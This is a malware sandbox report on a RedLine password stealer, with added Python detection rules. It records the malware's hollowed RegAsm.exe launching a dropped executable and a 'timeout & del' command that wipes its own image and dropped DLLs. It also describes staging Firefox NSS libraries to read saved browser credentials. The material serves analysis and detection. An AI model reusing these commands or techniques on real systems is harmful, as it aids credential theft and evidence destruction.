Source: AKECBFBAEBKJJJJKFCGC.3.dr Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: RegAsm.exe, 00000003.00000002.2046876722.000000001C378000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2043322423.0000000016408000.00000004.00000020.00020000.00000000.sdmp, sqln[1].dll.3.dr Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: softokn3[1].dll.3.dr, softokn3.dll.3.dr Binary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
Source: RegAsm.exe, 00000003.00000002.2046876722.000000001C378000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2043322423.0000000016408000.00000004.00000020.00020000.00000000.sdmp, sqln[1].dll.3.dr Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
Source: softokn3[1].dll.3.dr, softokn3.dll.3.dr Binary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;
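The SQLite statements above (the metaData table queries in softokn3.dll, the FTS and RBU schema strings in nss3.dll) are not the stealer's own code: they belong to Mozilla's NSS libraries, which the sample writes to C:\ProgramData (the freebl3.dll and mozglue.dll drops listed with their SHA-256 values earlier in this report) so it can open Firefox's key4.db and logins.json without Firefox running. The Python below is an added hunting check, not part of the Joe Sandbox report or of any Mozilla code: it walks file-creation events and flags NSS components written outside a Mozilla install directory, a single writer staging two or more of them in the same foreign directory, and exact matches against the three dropped-file hashes the report lists. The file-event records, the writer process, the Mozilla directory list and the all-zero placeholder hash for files whose SHA-256 the report does not give are constructed assumptions.

```python
"""Hunt for Mozilla NSS DLLs staged outside a Firefox/Thunderbird install (added example)."""
from __future__ import annotations

from dataclasses import dataclass
from typing import Iterable

# NSS / mozglue components the stealer dropped into C:\ProgramData in this report.
NSS_COMPONENTS = {"nss3.dll", "softokn3.dll", "freebl3.dll", "mozglue.dll"}

# Directories (lower-case prefixes) where these DLLs belong. Constructed list; extend per estate.
MOZILLA_INSTALL_PREFIXES = (
    "c:\\program files\\mozilla firefox\\",
    "c:\\program files (x86)\\mozilla firefox\\",
    "c:\\program files\\mozilla thunderbird\\",
    "c:\\program files (x86)\\mozilla thunderbird\\",
)

# SHA-256 values copied from the "Dropped File" lines of this report (lower-cased).
DROPPED_FILE_SHA256 = {
    "9bfe195aaee63e17887a211d9c9d88f819e5b49b19fd6dea1ec020dacbe8b34e": "CAFIJKFHIJ.exe",
    "edd043f2005dbd5902fc421eabb9472a7266950c5cbaca34e2d590b17d12f5fa": "freebl3.dll",
    "ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a": "mozglue.dll",
}


@dataclass(frozen=True)
class FileWrite:
    writer: str   # image path of the process that created the file
    path: str     # full path of the file written
    sha256: str


@dataclass(frozen=True)
class Finding:
    rule: str
    path: str
    detail: str


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def _dirname(path: str) -> str:
    norm = path.replace("/", "\\")
    return norm.rsplit("\\", 1)[0].lower() if "\\" in norm else ""


def analyze(events: Iterable[FileWrite]) -> list[Finding]:
    findings: list[Finding] = []
    bundles: dict[tuple[str, str], set[str]] = {}
    for ev in events:
        name = _basename(ev.path)
        # Rule 1: an NSS component landing anywhere but a Mozilla install directory.
        if name in NSS_COMPONENTS and not ev.path.lower().startswith(MOZILLA_INSTALL_PREFIXES):
            findings.append(Finding("nss_component_outside_mozilla_dir", ev.path, f"written by {ev.writer}"))
            bundles.setdefault((ev.writer.lower(), _dirname(ev.path)), set()).add(name)
        # Rule 2: exact hash match against the dropped files catalogued in the report.
        known = DROPPED_FILE_SHA256.get(ev.sha256.lower())
        if known is not None:
            findings.append(Finding("known_dropped_file_hash", ev.path, f"report hash of {known}"))
    # Rule 3: one writer staging two or more NSS components in the same foreign directory
    # is the loader assembling its offline Firefox credential toolkit.
    for (writer, directory), names in bundles.items():
        if len(names) >= 2:
            findings.append(Finding("nss_bundle_drop", directory, f"{writer} staged {sorted(names)}"))
    return findings


REGASM = "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe"
FAKE = "0" * 64  # constructed placeholder for files whose SHA-256 the report does not list

# Constructed sample input: the drops seen in this report plus one benign Firefox update.
SAMPLE_WRITES = [
    FileWrite(REGASM, "C:\\ProgramData\\freebl3.dll", "EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA"),
    FileWrite(REGASM, "C:\\ProgramData\\mozglue.dll", "BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A"),
    FileWrite(REGASM, "C:\\ProgramData\\nss3.dll", FAKE),
    FileWrite(REGASM, "C:\\ProgramData\\softokn3.dll", FAKE),
    FileWrite(REGASM, "C:\\ProgramData\\CAFIJKFHIJ.exe", "9BFE195AAEE63E17887A211D9C9D88F819E5B49B19FD6DEA1EC020DACBE8B34E"),
    FileWrite("C:\\Program Files\\Mozilla Firefox\\updater.exe", "C:\\Program Files\\Mozilla Firefox\\nss3.dll", FAKE),
]

if __name__ == "__main__":
    for f in analyze(SAMPLE_WRITES):
        print(f"{f.rule:34} {f.path}  ({f.detail})")
```

The DLL names alone prove nothing, since Firefox and its updater write the same files, which is why the first two rules key on location and on a single writer staging several components together rather than on the binaries themselves. The hash rule is exact-match only: it catches this report's drops and will miss any other build of the same components, so treat it as corroboration, not as the primary signal.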
Source: SecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exe ReversingLabs: Detection: 68%
Source: unknown Process created: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exe "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exe"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\ProgramData\CAFIJKFHIJ.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\ProgramData\CAFIJKFHIJ.exe "C:\ProgramData\CAFIJKFHIJ.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" & del "C:\ProgramData\*.dll"" & exit
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 5
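The process tree above shows three things a detection engineer can key on: the sample launches RegAsm.exe twice with an empty command line (RegAsm does nothing useful without an assembly path, so an argument-less launch from a binary on the user's desktop is a hollowing host, not a developer tool), the hollowed RegAsm.exe uses cmd.exe /c start to run the dropped executable straight from the C:\ProgramData root, and it finishes with a cmd.exe "timeout /t 5 & del" chain that erases its own image and sweeps the dropped DLLs out of C:\ProgramData. The Python below is an added example, not part of the Joe Sandbox report, that encodes those three observations as rules over constructed Sysmon-style process-creation records rebuilt from the "Process created" lines; the PIDs, the assumption that the second RegAsm instance is the parent of both cmd.exe chains, and the benign devenv.exe control record are invented for the sample input.

```python
"""Detection logic for the loader -> RegAsm.exe -> cmd.exe chain in this report (added example)."""
from __future__ import annotations

import re
from dataclasses import dataclass
from typing import Iterable


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str     # full path of the new process image
    cmdline: str   # command line as logged


@dataclass(frozen=True)
class Alert:
    rule: str
    pid: int
    detail: str


# Parent images under these prefixes are user-writable, i.e. not a development toolchain.
USER_WRITABLE_PREFIXES = ("c:\\users\\", "c:\\programdata\\", "c:\\windows\\temp\\")

SAMPLE = "C:\\Users\\user\\Desktop\\SecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exe"
REGASM = "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe"
CMD = "C:\\Windows\\SysWOW64\\cmd.exe"
CONHOST = "C:\\Windows\\System32\\conhost.exe"

# Constructed sample input: PIDs and parent links are invented, command lines come from the report.
EVENTS = [
    ProcEvent(100, 1, SAMPLE, f'"{SAMPLE}"'),
    ProcEvent(101, 100, CONHOST, "C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1"),
    ProcEvent(102, 100, REGASM, f'"{REGASM}"'),
    ProcEvent(103, 100, REGASM, f'"{REGASM}"'),
    ProcEvent(104, 103, CMD, '"C:\\Windows\\system32\\cmd.exe" /c start "" "C:\\ProgramData\\CAFIJKFHIJ.exe"'),
    ProcEvent(105, 104, CONHOST, "C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1"),
    ProcEvent(106, 104, "C:\\ProgramData\\CAFIJKFHIJ.exe", '"C:\\ProgramData\\CAFIJKFHIJ.exe"'),
    ProcEvent(107, 103, CMD, '"C:\\Windows\\system32\\cmd.exe" /c timeout /t 5 & del /f /q '
                             f'"{REGASM}" & del "C:\\ProgramData\\*.dll"" & exit'),
    ProcEvent(108, 107, CONHOST, "C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1"),
    ProcEvent(109, 107, "C:\\Windows\\SysWOW64\\timeout.exe", "timeout /t 5"),
    # Benign control (constructed): a developer registering an assembly from the IDE.
    ProcEvent(50, 1, "C:\\Program Files\\Microsoft Visual Studio\\Common7\\IDE\\devenv.exe", '"devenv.exe"'),
    ProcEvent(200, 50, REGASM, f'"{REGASM}" C:\\src\\MyLib.dll /codebase'),
]


def split_cmdline(cmdline: str) -> tuple[str, str]:
    """Split a Windows command line into (executable token, remaining arguments)."""
    m = re.match(r'\s*(?:"([^"]*)"|(\S+))\s*(.*)$', cmdline, re.S)
    if m is None:
        return "", ""
    exe = m.group(1) if m.group(1) is not None else m.group(2)
    return exe, m.group(3).strip()


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def detect(events: Iterable[ProcEvent]) -> list[Alert]:
    evs = list(events)
    by_pid = {e.pid: e for e in evs}
    alerts: list[Alert] = []
    for e in evs:
        parent = by_pid.get(e.ppid)
        name = basename(e.image)
        _, args = split_cmdline(e.cmdline)

        # Rule 1: RegAsm.exe needs an assembly path to do anything; an argument-less launch
        # from a parent in a user-writable directory is a hollowing host, not a build step.
        if (name == "regasm.exe" and not args and parent is not None
                and parent.image.lower().startswith(USER_WRITABLE_PREFIXES)):
            alerts.append(Alert("regasm_no_args_from_user_path", e.pid, f"parent={parent.image}"))

        # Rule 2: cmd.exe "timeout ... & del <parent image>" is the parent erasing itself
        # after its work (here also sweeping the dropped DLLs out of C:\ProgramData).
        if name == "cmd.exe" and parent is not None:
            low = e.cmdline.lower()
            if "timeout" in low and "del " in low and parent.image.lower() in low:
                alerts.append(Alert("self_delete_chain", e.pid, f"deletes {parent.image}"))

        # Rule 3: a binary executing straight from the C:\ProgramData root, no vendor subfolder.
        if re.fullmatch(r"c:\\programdata\\[^\\]+\.exe", e.image.lower()):
            alerts.append(Alert("exe_in_programdata_root", e.pid, e.image))
    return alerts


if __name__ == "__main__":
    for a in detect(EVENTS):
        print(f"{a.rule:30} pid={a.pid} {a.detail}")
```

Rule 2 deliberately requires the parent's own image path inside the del target, which is what separates self-deletion from ordinary cleanup scripts; a variant that delays with ping instead of timeout, or deletes via a renamed copy, would slip past the "timeout" check, so in production widen the delay token list rather than the del pattern. Rule 1 stays quiet for the devenv.exe control because RegAsm there receives an assembly argument and its parent lives under Program Files.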
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exe Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: apphelp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: aclayers.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: mpr.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sfc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sfc_os.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sspicli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: wininet.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: rstrtmgr.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ncrypt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ntasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: dbghelp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: iertutil.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: windows.storage.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: wldp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: profapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: winhttp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: mswsock.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: iphlpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: winnsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: urlmon.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: srvcli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: netutils.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: dnsapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: rasadhlp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: schannel.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: mskeyprotect.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: mozglue.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: wsock32.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: vcruntime140.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: msvcp140.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: vcruntime140.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: slc.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: pcacli.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\ProgramData\CAFIJKFHIJ.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\ProgramData\CAFIJKFHIJ.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\ProgramData\CAFIJKFHIJ.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\ProgramData\CAFIJKFHIJ.exe Section loaded: version.dll Jump to behavior
Source: C:\ProgramData\CAFIJKFHIJ.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\ProgramData\CAFIJKFHIJ.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\ProgramData\CAFIJKFHIJ.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\ProgramData\CAFIJKFHIJ.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\ProgramData\CAFIJKFHIJ.exe Section loaded: mscorjit.dll Jump to behavior
Source: C:\ProgramData\CAFIJKFHIJ.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\ProgramData\CAFIJKFHIJ.exe Section loaded: wldp.dll Jump to behavior
Source: C:\ProgramData\CAFIJKFHIJ.exe Section loaded: profapi.dll Jump to behavior
Source: C:\ProgramData\CAFIJKFHIJ.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\ProgramData\CAFIJKFHIJ.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\ProgramData\CAFIJKFHIJ.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\ProgramData\CAFIJKFHIJ.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\ProgramData\CAFIJKFHIJ.exe Section loaded: amsi.dll Jump to behavior
Source: C:\ProgramData\CAFIJKFHIJ.exe Section loaded: userenv.dll Jump to behavior
Source: C:\ProgramData\CAFIJKFHIJ.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32 Jump to behavior
Source: SecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: SecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: SecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: SecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: SecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: SecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: SecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: SecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: mozglue.pdbP source: RegAsm.exe, 00000003.00000002.2050716572.000000006C86D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.3.dr, mozglue.dll.3.dr
Source: Binary string: freebl3.pdb source: freebl3[1].dll.3.dr, freebl3.dll.3.dr
Source: Binary string: freebl3.pdbp source: freebl3[1].dll.3.dr, freebl3.dll.3.dr
Source: Binary string: nss3.pdb@ source: RegAsm.exe, 00000003.00000002.2051879138.000000006CA2F000.00000002.00000001.01000000.00000007.sdmp, nss3[1].dll.3.dr, nss3.dll.3.dr
Source: Binary string: C:\Users\Tommy\Documents\GitHub\Font-Awesome-WPF\src\WPF\FontAwesome.WPF\bin\Signed-Net40\FontAwesome.WPF.pdb source: CAFIJKFHIJ.exe, 00000009.00000000.1988827783.0000000000D02000.00000002.00000001.01000000.00000009.sdmp, CAFIJKFHIJ.exe.3.dr
Source: Binary string: C:\dev\sqlite\dotnet-private\obj\2015\System.Data.SQLite.Linq.2015\Release\System.Data.SQLite.Linq.pdb source: CAFIJKFHIJ.exe, 00000009.00000000.1988827783.0000000000D02000.00000002.00000001.01000000.00000009.sdmp, CAFIJKFHIJ.exe.3.dr
Source: Binary string: D:\JenkinsWorkspaces\trebuchet-stage-release\AWSDotNetPublic\sdk\src\Services\CloudWatch\obj\AWSSDK.CloudWatch.Net45\Release\net45\AWSSDK.CloudWatch.pdb source: CAFIJKFHIJ.exe, 00000009.00000000.1988827783.0000000000D02000.00000002.00000001.01000000.00000009.sdmp, CAFIJKFHIJ.exe.3.dr
Source: Binary string: /_/src/Autofac/obj/Release/netstandard2.0/Autofac.pdb source: CAFIJKFHIJ.exe, 00000009.00000000.1988827783.0000000000D02000.00000002.00000001.01000000.00000009.sdmp
Source: Binary string: /_/src/Autofac/obj/Release/netstandard2.0/Autofac.pdbSHA256@ source: CAFIJKFHIJ.exe, 00000009.00000000.1988827783.0000000000D02000.00000002.00000001.01000000.00000009.sdmp
Source: Binary string: C:\dev\sqlite\dotnet-private\obj\2015\System.Data.SQLite.2015\Release\System.Data.SQLite.pdb source: CAFIJKFHIJ.exe, 00000009.00000000.1988827783.0000000000D02000.00000002.00000001.01000000.00000009.sdmp
Source: Binary string: C:\dev\sqlite\dotnet-private\obj\2015\System.Data.SQLite.2015\Release\System.Data.SQLite.pdb\ source: CAFIJKFHIJ.exe, 00000009.00000000.1988827783.0000000000D02000.00000002.00000001.01000000.00000009.sdmp
Source: Binary string: C:\dev\sqlite\dotnet-private\obj\2015\System.Data.SQLite.EF6.2015\Release\System.Data.SQLite.EF6.pdbH source: CAFIJKFHIJ.exe, 00000009.00000000.1988827783.0000000000D02000.00000002.00000001.01000000.00000009.sdmp, CAFIJKFHIJ.exe.3.dr
Source: Binary string: softokn3.pdb@ source: softokn3[1].dll.3.dr, softokn3.dll.3.dr
Source: Binary string: /home/tmds/repos/Tmds.DBus/src/Tmds.DBus/obj/Release/netstandard2.0/Tmds.DBus.pdbSHA256$ source: CAFIJKFHIJ.exe, 00000009.00000000.1988827783.0000000000D02000.00000002.00000001.01000000.00000009.sdmp, CAFIJKFHIJ.exe.3.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.3.dr, vcruntime140[1].dll.3.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.3.dr, msvcp140.dll.3.dr
Source: Binary string: nss3.pdb source: RegAsm.exe, 00000003.00000002.2051879138.000000006CA2F000.00000002.00000001.01000000.00000007.sdmp, nss3[1].dll.3.dr, nss3.dll.3.dr
Source: Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: RegAsm.exe, 00000003.00000002.2046876722.000000001C378000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2043322423.0000000016408000.00000004.00000020.00020000.00000000.sdmp, sqln[1].dll.3.dr
Source: Binary string: mozglue.pdb source: RegAsm.exe, 00000003.00000002.2050716572.000000006C86D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.3.dr, mozglue.dll.3.dr
Source: Binary string: softokn3.pdb source: softokn3[1].dll.3.dr, softokn3.dll.3.dr
Source: Binary string: C:\dev\sqlite\dotnet-private\obj\2015\System.Data.SQLite.EF6.2015\Release\System.Data.SQLite.EF6.pdb source: CAFIJKFHIJ.exe, 00000009.00000000.1988827783.0000000000D02000.00000002.00000001.01000000.00000009.sdmp, CAFIJKFHIJ.exe.3.dr
Source: Binary string: D:\JenkinsWorkspaces\trebuchet-stage-release\AWSDotNetPublic\sdk\src\Services\CloudWatch\obj\AWSSDK.CloudWatch.Net45\Release\net45\AWSSDK.CloudWatch.pdbSHA256 source: CAFIJKFHIJ.exe, 00000009.00000000.1988827783.0000000000D02000.00000002.00000001.01000000.00000009.sdmp, CAFIJKFHIJ.exe.3.dr
Source: Binary string: /home/tmds/repos/Tmds.DBus/src/Tmds.DBus/obj/Release/netstandard2.0/Tmds.DBus.pdb source: CAFIJKFHIJ.exe, 00000009.00000000.1988827783.0000000000D02000.00000002.00000001.01000000.00000009.sdmp, CAFIJKFHIJ.exe.3.dr
Source: SecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: SecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: SecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: SecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: SecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
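
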